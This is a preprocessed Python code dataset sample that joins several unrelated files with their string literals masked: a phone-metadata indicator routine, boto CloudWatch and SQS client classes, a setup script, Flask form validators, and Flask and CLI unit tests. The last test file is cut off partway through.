'<STR_LIT>' if groupby == '<STR_LIT>' else '<STR_LIT>' <EOL> number_of_interactions_in = partial ( bc . individual . number_of_interactions , direction = '<STR_LIT>' ) <EOL> number_of_interactions_in . __name__ = '<STR_LIT>' <EOL> number_of_interactions_out = partial ( bc . individual . number_of_interactions , direction = '<STR_LIT>' ) <EOL> number_of_interactions_out . __name__ = '<STR_LIT>' <EOL> functions = [ <EOL> ( bc . individual . active_days , scalar_type ) , <EOL> ( bc . individual . number_of_contacts , scalar_type ) , <EOL> ( bc . individual . call_duration , summary_type ) , <EOL> ( bc . individual . percent_nocturnal , scalar_type ) , <EOL> ( bc . individual . percent_initiated_conversations , scalar_type ) , <EOL> ( bc . individual . percent_initiated_interactions , scalar_type ) , <EOL> ( bc . individual . response_delay_text , summary_type ) , <EOL> ( bc . individual . 
response_rate_text , scalar_type ) , <EOL> ( bc . individual . entropy_of_contacts , scalar_type ) , <EOL> ( bc . individual . balance_of_contacts , summary_type ) , <EOL> ( bc . individual . interactions_per_contact , summary_type ) , <EOL> ( bc . individual . interevent_time , summary_type ) , <EOL> ( bc . individual . percent_pareto_interactions , scalar_type ) , <EOL> ( bc . individual . percent_pareto_durations , scalar_type ) , <EOL> ( bc . individual . number_of_interactions , scalar_type ) , <EOL> ( number_of_interactions_in , scalar_type ) , <EOL> ( number_of_interactions_out , scalar_type ) , <EOL> ( bc . spatial . number_of_antennas , scalar_type ) , <EOL> ( bc . spatial . entropy_of_antennas , scalar_type ) , <EOL> ( bc . spatial . percent_at_home , scalar_type ) , <EOL> ( bc . spatial . radius_of_gyration , scalar_type ) , <EOL> ( bc . spatial . frequent_antennas , scalar_type ) , <EOL> ( bc . spatial . churn_rate , scalar_type ) <EOL> ] <EOL> network_functions = [ <EOL> bc . network . clustering_coefficient_unweighted , <EOL> bc . network . clustering_coefficient_weighted , <EOL> bc . network . assortativity_attributes , <EOL> bc . network . assortativity_indicators <EOL> ] <EOL> groups = [ [ r for r in g ] for g in group_records ( user , groupby = groupby ) ] <EOL> reporting = OrderedDict ( [ <EOL> ( '<STR_LIT>' , user . antennas_path ) , <EOL> ( '<STR_LIT>' , user . attributes_path ) , <EOL> ( '<STR_LIT:version>' , bc . __version__ ) , <EOL> ( '<STR_LIT>' , groupby ) , <EOL> ( '<STR_LIT>' , split_week ) , <EOL> ( '<STR_LIT>' , split_day ) , <EOL> ( '<STR_LIT>' , user . start_time and str ( user . start_time ) ) , <EOL> ( '<STR_LIT>' , user . end_time and str ( user . end_time ) ) , <EOL> ( '<STR_LIT>' , str ( user . night_start ) ) , <EOL> ( '<STR_LIT>' , str ( user . night_end ) ) , <EOL> ( '<STR_LIT>' , user . weekend ) , <EOL> ( '<STR_LIT>' , len ( groups ) ) , <EOL> ( '<STR_LIT>' , user . has_call ) , <EOL> ( '<STR_LIT>' , user . 
has_text ) , <EOL> ( '<STR_LIT>' , user . has_home ) , <EOL> ( '<STR_LIT>' , user . has_network ) , <EOL> ( '<STR_LIT>' , bc . helper . tools . percent_records_missing_location ( user ) ) , <EOL> ( '<STR_LIT>' , bc . helper . tools . antennas_missing_locations ( user ) ) , <EOL> ( '<STR_LIT>' , user . percent_outofnetwork_calls ) , <EOL> ( '<STR_LIT>' , user . percent_outofnetwork_texts ) , <EOL> ( '<STR_LIT>' , user . percent_outofnetwork_contacts ) , <EOL> ( '<STR_LIT>' , user . percent_outofnetwork_call_durations ) , <EOL> ] ) <EOL> if user . records is not None : <EOL> reporting [ '<STR_LIT>' ] = len ( user . records ) <EOL> else : <EOL> reporting [ '<STR_LIT>' ] = <NUM_LIT:0.> <EOL> if user . ignored_records is not None : <EOL> reporting [ '<STR_LIT>' ] = user . ignored_records <EOL> returned = OrderedDict ( [ <EOL> ( '<STR_LIT:name>' , user . name ) , <EOL> ( '<STR_LIT>' , reporting ) <EOL> ] ) <EOL> for fun , datatype in functions : <EOL> try : <EOL> metric = fun ( user , groupby = groupby , summary = summary , datatype = datatype , split_week = split_week , split_day = split_day ) <EOL> except ValueError : <EOL> metric = fun ( user , groupby = groupby , datatype = datatype , split_week = split_week , split_day = split_day ) <EOL> returned [ fun . __name__ ] = metric <EOL> if network and user . has_network : <EOL> for fun in network_functions : <EOL> returned [ fun . __name__ ] = fun ( user ) <EOL> if attributes and user . attributes != { } : <EOL> returned [ '<STR_LIT>' ] = user . attributes <EOL> if flatten is True : <EOL> return globals ( ) [ '<STR_LIT>' ] ( returned ) <EOL> return returned </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> import json <EOL> from boto . connection import AWSQueryConnection <EOL> from boto . ec2 . cloudwatch . metric import Metric <EOL> from boto . ec2 . cloudwatch . alarm import MetricAlarm , MetricAlarms , AlarmHistoryItem <EOL> from boto . ec2 . cloudwatch . datapoint import Datapoint <EOL> from boto . regioninfo import RegionInfo <EOL> import boto <EOL> RegionData = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> def regions ( ) : <EOL> """<STR_LIT>""" <EOL> regions = [ ] <EOL> for region_name in RegionData : <EOL> region = RegionInfo ( name = region_name , <EOL> endpoint = RegionData [ region_name ] , <EOL> connection_cls = CloudWatchConnection ) <EOL> regions . append ( region ) <EOL> return regions <EOL> def connect_to_region ( region_name , ** kw_params ) : <EOL> """<STR_LIT>""" <EOL> for region in regions ( ) : <EOL> if region . name == region_name : <EOL> return region . connect ( ** kw_params ) <EOL> return None <EOL> class CloudWatchConnection ( AWSQueryConnection ) : <EOL> APIVersion = boto . config . get ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DefaultRegionName = boto . config . get ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> DefaultRegionEndpoint = boto . config . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def __init__ ( self , aws_access_key_id = None , aws_secret_access_key = None , <EOL> is_secure = True , port = None , proxy = None , proxy_port = None , <EOL> proxy_user = None , proxy_pass = None , debug = <NUM_LIT:0> , <EOL> https_connection_factory = None , region = None , path = '<STR_LIT:/>' ) : <EOL> """<STR_LIT>""" <EOL> if not region : <EOL> region = RegionInfo ( self , self . DefaultRegionName , <EOL> self . 
DefaultRegionEndpoint ) <EOL> self . region = region <EOL> AWSQueryConnection . __init__ ( self , aws_access_key_id , <EOL> aws_secret_access_key , <EOL> is_secure , port , proxy , proxy_port , <EOL> proxy_user , proxy_pass , <EOL> self . region . endpoint , debug , <EOL> https_connection_factory , path ) <EOL> def _required_auth_capability ( self ) : <EOL> return [ '<STR_LIT>' ] <EOL> def build_dimension_param ( self , dimension , params ) : <EOL> for i , dim_name in enumerate ( dimension ) : <EOL> dim_value = dimension [ dim_name ] <EOL> if isinstance ( dim_value , basestring ) : <EOL> dim_value = [ dim_value ] <EOL> for j , value in enumerate ( dim_value ) : <EOL> params [ '<STR_LIT>' % ( i + <NUM_LIT:1> , j + <NUM_LIT:1> ) ] = dim_name <EOL> params [ '<STR_LIT>' % ( i + <NUM_LIT:1> , j + <NUM_LIT:1> ) ] = value <EOL> def build_list_params ( self , params , items , label ) : <EOL> if isinstance ( items , basestring ) : <EOL> items = [ items ] <EOL> for index , item in enumerate ( items ) : <EOL> i = index + <NUM_LIT:1> <EOL> if isinstance ( item , dict ) : <EOL> for k , v in item . iteritems ( ) : <EOL> params [ label % ( i , '<STR_LIT:Name>' ) ] = k <EOL> if v is not None : <EOL> params [ label % ( i , '<STR_LIT>' ) ] = v <EOL> else : <EOL> params [ label % i ] = item <EOL> def build_put_params ( self , params , name , value = None , timestamp = None , <EOL> unit = None , dimensions = None , statistics = None ) : <EOL> args = ( name , value , unit , dimensions , statistics ) <EOL> length = max ( map ( lambda a : len ( a ) if isinstance ( a , list ) else <NUM_LIT:1> , args ) ) <EOL> def aslist ( a ) : <EOL> if isinstance ( a , list ) : <EOL> if len ( a ) != length : <EOL> raise Exception ( '<STR_LIT>' % length ) <EOL> return a <EOL> return [ a ] * length <EOL> for index , ( n , v , u , d , s ) in enumerate ( zip ( * map ( aslist , args ) ) ) : <EOL> metric_data = { '<STR_LIT>' : n } <EOL> if timestamp : <EOL> metric_data [ '<STR_LIT>' ] = timestamp . 
isoformat ( ) <EOL> if unit : <EOL> metric_data [ '<STR_LIT>' ] = u <EOL> if dimensions : <EOL> self . build_dimension_param ( d , metric_data ) <EOL> if statistics : <EOL> metric_data [ '<STR_LIT>' ] = s [ '<STR_LIT>' ] <EOL> metric_data [ '<STR_LIT>' ] = s [ '<STR_LIT>' ] <EOL> metric_data [ '<STR_LIT>' ] = s [ '<STR_LIT>' ] <EOL> metric_data [ '<STR_LIT>' ] = s [ '<STR_LIT>' ] <EOL> if value != None : <EOL> msg = '<STR_LIT>' <EOL> msg += '<STR_LIT>' <EOL> boto . log . warn ( msg ) <EOL> elif value != None : <EOL> metric_data [ '<STR_LIT>' ] = v <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> for key , value in metric_data . iteritems ( ) : <EOL> params [ '<STR_LIT>' % ( index + <NUM_LIT:1> , key ) ] = value <EOL> def get_metric_statistics ( self , period , start_time , end_time , metric_name , <EOL> namespace , statistics , dimensions = None , <EOL> unit = None ) : <EOL> """<STR_LIT>""" <EOL> params = { '<STR_LIT>' : period , <EOL> '<STR_LIT>' : metric_name , <EOL> '<STR_LIT>' : namespace , <EOL> '<STR_LIT>' : start_time . isoformat ( ) , <EOL> '<STR_LIT>' : end_time . isoformat ( ) } <EOL> self . build_list_params ( params , statistics , '<STR_LIT>' ) <EOL> if dimensions : <EOL> self . build_dimension_param ( dimensions , params ) <EOL> return self . get_list ( '<STR_LIT>' , params , <EOL> [ ( '<STR_LIT>' , Datapoint ) ] ) <EOL> def list_metrics ( self , next_token = None , dimensions = None , <EOL> metric_name = None , namespace = None ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> if next_token : <EOL> params [ '<STR_LIT>' ] = next_token <EOL> if dimensions : <EOL> self . build_dimension_param ( dimensions , params ) <EOL> if metric_name : <EOL> params [ '<STR_LIT>' ] = metric_name <EOL> if namespace : <EOL> params [ '<STR_LIT>' ] = namespace <EOL> return self . 
get_list ( '<STR_LIT>' , params , [ ( '<STR_LIT>' , Metric ) ] ) <EOL> def put_metric_data ( self , namespace , name , value = None , timestamp = None , <EOL> unit = None , dimensions = None , statistics = None ) : <EOL> """<STR_LIT>""" <EOL> params = { '<STR_LIT>' : namespace } <EOL> self . build_put_params ( params , name , value = value , timestamp = timestamp , <EOL> unit = unit , dimensions = dimensions , statistics = statistics ) <EOL> return self . get_status ( '<STR_LIT>' , params ) <EOL> def describe_alarms ( self , action_prefix = None , alarm_name_prefix = None , <EOL> alarm_names = None , max_records = None , state_value = None , <EOL> next_token = None ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> if action_prefix : <EOL> params [ '<STR_LIT>' ] = action_prefix <EOL> if alarm_name_prefix : <EOL> params [ '<STR_LIT>' ] = alarm_name_prefix <EOL> elif alarm_names : <EOL> self . build_list_params ( params , alarm_names , '<STR_LIT>' ) <EOL> if max_records : <EOL> params [ '<STR_LIT>' ] = max_records <EOL> if next_token : <EOL> params [ '<STR_LIT>' ] = next_token <EOL> if state_value : <EOL> params [ '<STR_LIT>' ] = state_value <EOL> return self . get_list ( '<STR_LIT>' , params , <EOL> [ ( '<STR_LIT>' , MetricAlarms ) ] ) [ <NUM_LIT:0> ] <EOL> def describe_alarm_history ( self , alarm_name = None , <EOL> start_date = None , end_date = None , <EOL> max_records = None , history_item_type = None , <EOL> next_token = None ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> if alarm_name : <EOL> params [ '<STR_LIT>' ] = alarm_name <EOL> if start_date : <EOL> params [ '<STR_LIT>' ] = start_date . isoformat ( ) <EOL> if end_date : <EOL> params [ '<STR_LIT>' ] = end_date . isoformat ( ) <EOL> if history_item_type : <EOL> params [ '<STR_LIT>' ] = history_item_type <EOL> if max_records : <EOL> params [ '<STR_LIT>' ] = max_records <EOL> if next_token : <EOL> params [ '<STR_LIT>' ] = next_token <EOL> return self . 
get_list ( '<STR_LIT>' , params , <EOL> [ ( '<STR_LIT>' , AlarmHistoryItem ) ] ) <EOL> def describe_alarms_for_metric ( self , metric_name , namespace , period = None , <EOL> statistic = None , dimensions = None , unit = None ) : <EOL> """<STR_LIT>""" <EOL> params = { '<STR_LIT>' : metric_name , <EOL> '<STR_LIT>' : namespace } <EOL> if period : <EOL> params [ '<STR_LIT>' ] = period <EOL> if statistic : <EOL> params [ '<STR_LIT>' ] = statistic <EOL> if dimensions : <EOL> self . build_dimension_param ( dimensions , params ) <EOL> if unit : <EOL> params [ '<STR_LIT>' ] = unit <EOL> return self . get_list ( '<STR_LIT>' , params , <EOL> [ ( '<STR_LIT>' , MetricAlarm ) ] ) <EOL> def put_metric_alarm ( self , alarm ) : <EOL> """<STR_LIT>""" <EOL> params = { <EOL> '<STR_LIT>' : alarm . name , <EOL> '<STR_LIT>' : alarm . metric , <EOL> '<STR_LIT>' : alarm . namespace , <EOL> '<STR_LIT>' : alarm . statistic , <EOL> '<STR_LIT>' : alarm . comparison , <EOL> '<STR_LIT>' : alarm . threshold , <EOL> '<STR_LIT>' : alarm . evaluation_periods , <EOL> '<STR_LIT>' : alarm . period , <EOL> } <EOL> if alarm . actions_enabled is not None : <EOL> params [ '<STR_LIT>' ] = alarm . actions_enabled <EOL> if alarm . alarm_actions : <EOL> self . build_list_params ( params , alarm . alarm_actions , <EOL> '<STR_LIT>' ) <EOL> if alarm . description : <EOL> params [ '<STR_LIT>' ] = alarm . description <EOL> if alarm . dimensions : <EOL> self . build_dimension_param ( alarm . dimensions , params ) <EOL> if alarm . insufficient_data_actions : <EOL> self . build_list_params ( params , alarm . insufficient_data_actions , <EOL> '<STR_LIT>' ) <EOL> if alarm . ok_actions : <EOL> self . build_list_params ( params , alarm . ok_actions , <EOL> '<STR_LIT>' ) <EOL> if alarm . unit : <EOL> params [ '<STR_LIT>' ] = alarm . unit <EOL> alarm . connection = self <EOL> return self . 
get_status ( '<STR_LIT>' , params ) <EOL> create_alarm = put_metric_alarm <EOL> update_alarm = put_metric_alarm <EOL> def delete_alarms ( self , alarms ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> self . build_list_params ( params , alarms , '<STR_LIT>' ) <EOL> return self . get_status ( '<STR_LIT>' , params ) <EOL> def set_alarm_state ( self , alarm_name , state_reason , state_value , <EOL> state_reason_data = None ) : <EOL> """<STR_LIT>""" <EOL> params = { '<STR_LIT>' : alarm_name , <EOL> '<STR_LIT>' : state_reason , <EOL> '<STR_LIT>' : state_value } <EOL> if state_reason_data : <EOL> params [ '<STR_LIT>' ] = json . dumps ( state_reason_data ) <EOL> return self . get_status ( '<STR_LIT>' , params ) <EOL> def enable_alarm_actions ( self , alarm_names ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> self . build_list_params ( params , alarm_names , '<STR_LIT>' ) <EOL> return self . get_status ( '<STR_LIT>' , params ) <EOL> def disable_alarm_actions ( self , alarm_names ) : <EOL> """<STR_LIT>""" <EOL> params = { } <EOL> self . build_list_params ( params , alarm_names , '<STR_LIT>' ) <EOL> return self . get_status ( '<STR_LIT>' , params ) </s>
<s> """<STR_LIT>""" <EOL> import urlparse <EOL> from boto . sqs . message import Message <EOL> class Queue : <EOL> def __init__ ( self , connection = None , url = None , message_class = Message ) : <EOL> self . connection = connection <EOL> self . url = url <EOL> self . message_class = message_class <EOL> self . visibility_timeout = None <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . url <EOL> def _id ( self ) : <EOL> if self . url : <EOL> val = urlparse . urlparse ( self . url ) [ <NUM_LIT:2> ] <EOL> else : <EOL> val = self . url <EOL> return val <EOL> id = property ( _id ) <EOL> def _name ( self ) : <EOL> if self . url : <EOL> val = urlparse . urlparse ( self . url ) [ <NUM_LIT:2> ] . split ( '<STR_LIT:/>' ) [ <NUM_LIT:2> ] <EOL> else : <EOL> val = self . url <EOL> return val <EOL> name = property ( _name ) <EOL> def startElement ( self , name , attrs , connection ) : <EOL> return None <EOL> def endElement ( self , name , value , connection ) : <EOL> if name == '<STR_LIT>' : <EOL> self . url = value <EOL> elif name == '<STR_LIT>' : <EOL> self . visibility_timeout = int ( value ) <EOL> else : <EOL> setattr ( self , name , value ) <EOL> def set_message_class ( self , message_class ) : <EOL> """<STR_LIT>""" <EOL> self . message_class = message_class <EOL> def get_attributes ( self , attributes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . get_queue_attributes ( self , attributes ) <EOL> def set_attribute ( self , attribute , value ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . set_queue_attribute ( self , attribute , value ) <EOL> def get_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> a = self . get_attributes ( '<STR_LIT>' ) <EOL> return int ( a [ '<STR_LIT>' ] ) <EOL> def set_timeout ( self , visibility_timeout ) : <EOL> """<STR_LIT>""" <EOL> retval = self . set_attribute ( '<STR_LIT>' , visibility_timeout ) <EOL> if retval : <EOL> self . 
visibility_timeout = visibility_timeout <EOL> return retval <EOL> def add_permission ( self , label , aws_account_id , action_name ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . add_permission ( self , label , aws_account_id , action_name ) <EOL> def remove_permission ( self , label ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . remove_permission ( self , label ) <EOL> def read ( self , visibility_timeout = None ) : <EOL> """<STR_LIT>""" <EOL> rs = self . get_messages ( <NUM_LIT:1> , visibility_timeout ) <EOL> if len ( rs ) == <NUM_LIT:1> : <EOL> return rs [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def write ( self , message , delay_seconds = None ) : <EOL> """<STR_LIT>""" <EOL> new_msg = self . connection . send_message ( self , message . get_body_encoded ( ) , delay_seconds ) <EOL> message . id = new_msg . id <EOL> message . md5 = new_msg . md5 <EOL> return message <EOL> def new_message ( self , body = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> m = self . message_class ( self , body ) <EOL> m . queue = self <EOL> return m <EOL> def get_messages ( self , num_messages = <NUM_LIT:1> , visibility_timeout = None , <EOL> attributes = None ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . receive_message ( self , number_messages = num_messages , <EOL> visibility_timeout = visibility_timeout , <EOL> attributes = attributes ) <EOL> def delete_message ( self , message ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . delete_message ( self , message ) <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . connection . delete_queue ( self ) <EOL> def clear ( self , page_size = <NUM_LIT:10> , vtimeout = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> l = self . get_messages ( page_size , vtimeout ) <EOL> while l : <EOL> for m in l : <EOL> self . delete_message ( m ) <EOL> n += <NUM_LIT:1> <EOL> l = self . 
get_messages ( page_size , vtimeout ) <EOL> return n <EOL> def count ( self , page_size = <NUM_LIT:10> , vtimeout = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> a = self . get_attributes ( '<STR_LIT>' ) <EOL> return int ( a [ '<STR_LIT>' ] ) <EOL> def count_slow ( self , page_size = <NUM_LIT:10> , vtimeout = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> l = self . get_messages ( page_size , vtimeout ) <EOL> while l : <EOL> for m in l : <EOL> n += <NUM_LIT:1> <EOL> l = self . get_messages ( page_size , vtimeout ) <EOL> return n <EOL> def dump ( self , file_name , page_size = <NUM_LIT:10> , vtimeout = <NUM_LIT:10> , sep = '<STR_LIT:\n>' ) : <EOL> """<STR_LIT>""" <EOL> fp = open ( file_name , '<STR_LIT:wb>' ) <EOL> n = <NUM_LIT:0> <EOL> l = self . get_messages ( page_size , vtimeout ) <EOL> while l : <EOL> for m in l : <EOL> fp . write ( m . get_body ( ) ) <EOL> if sep : <EOL> fp . write ( sep ) <EOL> n += <NUM_LIT:1> <EOL> l = self . get_messages ( page_size , vtimeout ) <EOL> fp . close ( ) <EOL> return n <EOL> def save_to_file ( self , fp , sep = '<STR_LIT:\n>' ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> m = self . read ( ) <EOL> while m : <EOL> n += <NUM_LIT:1> <EOL> fp . write ( m . get_body ( ) ) <EOL> if sep : <EOL> fp . write ( sep ) <EOL> self . delete_message ( m ) <EOL> m = self . read ( ) <EOL> return n <EOL> def save_to_filename ( self , file_name , sep = '<STR_LIT:\n>' ) : <EOL> """<STR_LIT>""" <EOL> fp = open ( file_name , '<STR_LIT:wb>' ) <EOL> n = self . save_to_file ( fp , sep ) <EOL> fp . close ( ) <EOL> return n <EOL> save = save_to_filename <EOL> def save_to_s3 ( self , bucket ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> m = self . read ( ) <EOL> while m : <EOL> n += <NUM_LIT:1> <EOL> key = bucket . new_key ( '<STR_LIT>' % ( self . id , m . id ) ) <EOL> key . set_contents_from_string ( m . get_body ( ) ) <EOL> self . delete_message ( m ) <EOL> m = self . 
read ( ) <EOL> return n <EOL> def load_from_s3 ( self , bucket , prefix = None ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> if prefix : <EOL> prefix = '<STR_LIT>' % prefix <EOL> else : <EOL> prefix = '<STR_LIT>' % self . id [ <NUM_LIT:1> : ] <EOL> rs = bucket . list ( prefix = prefix ) <EOL> for key in rs : <EOL> n += <NUM_LIT:1> <EOL> m = self . new_message ( key . get_contents_as_string ( ) ) <EOL> self . write ( m ) <EOL> return n <EOL> def load_from_file ( self , fp , sep = '<STR_LIT:\n>' ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:0> <EOL> body = '<STR_LIT>' <EOL> l = fp . readline ( ) <EOL> while l : <EOL> if l == sep : <EOL> m = Message ( self , body ) <EOL> self . write ( m ) <EOL> n += <NUM_LIT:1> <EOL> print '<STR_LIT>' % n <EOL> body = '<STR_LIT>' <EOL> else : <EOL> body = body + l <EOL> l = fp . readline ( ) <EOL> return n <EOL> def load_from_filename ( self , file_name , sep = '<STR_LIT:\n>' ) : <EOL> """<STR_LIT>""" <EOL> fp = open ( file_name , '<STR_LIT:rb>' ) <EOL> n = self . load_from_file ( fp , sep ) <EOL> fp . close ( ) <EOL> return n <EOL> load = load_from_filename </s>
<s> import os <EOL> import sys ; reload ( sys ) . setdefaultencoding ( '<STR_LIT:utf-8>' ) <EOL> from distribute_setup import use_setuptools <EOL> use_setuptools ( ) <EOL> from setuptools import setup , find_packages <EOL> long_description = open ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) . read ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> long_description = long_description , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = ( '<STR_LIT:test>' , ) ) , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Queue ( object ) : <EOL> def __new__ ( cls , mode = '<STR_LIT>' , * args , ** kwargs ) : <EOL> if mode == '<STR_LIT>' : <EOL> from zenqueue . queue import async <EOL> return async . Queue ( * args , ** kwargs ) <EOL> elif mode == '<STR_LIT>' : <EOL> from zenqueue . queue import sync <EOL> return sync . Queue ( * args , ** kwargs ) <EOL> raise ValueError ( '<STR_LIT>' % ( mode , ) ) </s>
<s> from flask import request <EOL> from werkzeug import FileStorage <EOL> from wtforms import FileField as _FileField <EOL> from wtforms import ValidationError <EOL> def is_file ( field ) : <EOL> return isinstance ( field . data , FileStorage ) and field . data . filename is not None <EOL> class FileField ( _FileField ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def file ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data <EOL> class FileRequired ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message = None ) : <EOL> self . message = message <EOL> def __call__ ( self , form , field ) : <EOL> if not is_file ( field ) : <EOL> raise ValidationError , self . message <EOL> file_required = FileRequired <EOL> class FileAllowed ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , upload_set , message = None ) : <EOL> self . upload_set = upload_set <EOL> self . message = message <EOL> def __call__ ( self , form , field ) : <EOL> if not is_file ( field ) : <EOL> return <EOL> if not self . upload_set . file_allowed ( <EOL> field . data , field . data . filename ) : <EOL> raise ValidationError , self . message <EOL> file_allowed = FileAllowed </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import warnings <EOL> from google . appengine . ext import testbed <EOL> warnings . simplefilter ( '<STR_LIT:ignore>' ) <EOL> import flask <EOL> from app import create_app <EOL> class LibsImportTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> import libs . flask <EOL> self . path = libs . flask . __path__ <EOL> def test_regular_path_without_libs ( self ) : <EOL> flask_path = flask . __path__ <EOL> assert flask_path == self . path <EOL> class AppTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . testbed = testbed . Testbed ( ) <EOL> self . testbed . activate ( ) <EOL> self . testbed . init_datastore_v3_stub ( ) <EOL> app = create_app ( ) <EOL> self . app = app . test_client ( ) <EOL> def tearDown ( self ) : <EOL> self . testbed . deactivate ( ) <EOL> def test_index_page ( self ) : <EOL> rv = self . app . get ( '<STR_LIT:/>' ) <EOL> assert "<STR_LIT>" in rv . data <EOL> def test_flask_default_redirecting ( self ) : <EOL> rv = self . app . get ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in rv . data <EOL> assert rv . status_code == <NUM_LIT> <EOL> def test_todo_page ( self ) : <EOL> rv = self . app . get ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in rv . data <EOL> def test_add_todo_and_redirect ( self ) : <EOL> rv = self . app . post ( '<STR_LIT>' , data = dict ( todo = '<STR_LIT>' ) ) <EOL> assert '<STR_LIT>' in rv . data <EOL> def test_qunit_page ( self ) : <EOL> rv = self . app . get ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in rv . data <EOL> def test_404_page ( self ) : <EOL> rv = self . app . get ( '<STR_LIT>' ) <EOL> assert rv . status_code == <NUM_LIT> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import json <EOL> import os <EOL> from click . testing import CliRunner <EOL> from unittest . mock import MagicMock <EOL> import yaml <EOL> import zign . api <EOL> from pierone . cli import cli <EOL> def test_version ( monkeypatch ) : <EOL> runner = CliRunner ( ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' ] , catch_exceptions = False ) <EOL> assert '<STR_LIT>' in result . output <EOL> def test_login ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> runner = CliRunner ( ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x , timeout : response ) <EOL> with runner . isolated_filesystem ( ) : <EOL> result = runner . invoke ( cli , [ '<STR_LIT>' ] , catch_exceptions = False , input = '<STR_LIT>' ) <EOL> with open ( os . path . join ( str ( tmpdir ) , '<STR_LIT>' ) ) as fd : <EOL> data = json . load ( fd ) <EOL> assert data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert '<STR_LIT>' in result . output <EOL> assert result . output . rstrip ( ) . endswith ( '<STR_LIT:OK>' ) <EOL> def test_login_given_url_option ( monkeypatch , tmpdir ) : <EOL> response = MagicMock ( ) <EOL> runner = CliRunner ( ) <EOL> config = { } <EOL> def store ( data , section ) : <EOL> config . update ( ** data ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : { } ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , store ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , MagicMock ( return_value = { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x : x . replace ( '<STR_LIT>' , str ( tmpdir ) ) ) <EOL> monkeypatch . setattr ( '<STR_LIT>' , lambda x , timeout : response ) <EOL> with runner . 
